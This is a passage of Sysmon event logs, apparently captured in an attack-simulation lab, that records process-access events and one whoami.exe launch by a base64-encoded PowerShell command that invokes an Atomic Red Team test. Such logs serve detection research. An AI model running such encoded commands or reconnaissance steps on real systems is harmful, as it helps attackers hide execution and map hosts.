07:59:10.674","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4957,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4958,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4959,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4960,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4961,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4962,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-0010BFA10700}\r\nSourceProcessId: 4376\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20CE-5F25-0000-0010D8E70700}\r\nTargetProcessId: 4944\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-0010BFA10700}","SourceProcessId":"4376","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20CE-5F25-0000-0010D8E70700}","TargetProcessId":"4944","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4963,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.686\r\nProcessGuid: {41C8662E-20CE-5F25-0000-001007E90700}\r\nProcessId: 1156\r\nImage: C:\\Windows\\System32\\whoami.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: whoami - displays logged on user information\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: whoami.exe\r\nCommandLine: \"C:\\Windows\\system32\\whoami.exe\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CD-5F25-0000-002017A10700}\r\nLogonId: 0x7A117\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9\r\nParentProcessGuid: {41C8662E-20CE-5F25-0000-0010A7CC0700}\r\nParentProcessId: 2456\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.686","ProcessGuid":"{41C8662E-20CE-5F25-0000-001007E90700}","Image":"C:\\Windows\\System32\\whoami.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"whoami - displays logged on user information","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"whoami.exe","CommandLine":"\"C:\\Windows\\system32\\whoami.exe\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CD-5F25-0000-002017A10700}","LogonId":"0x7a117","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9","ParentProcessGuid":"{41C8662E-20CE-5F25-0000-0010A7CC0700}","ParentProcessId":"2456","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4964,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-20CE-5F25-0000-0010A7CC0700}\r\nSourceProcessId: 2456\r\nSourceThreadId: 5028\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20CE-5F25-0000-001007E90700}\r\nTargetProcessId: 1156\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+af0fd2db|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e3b5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e086|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b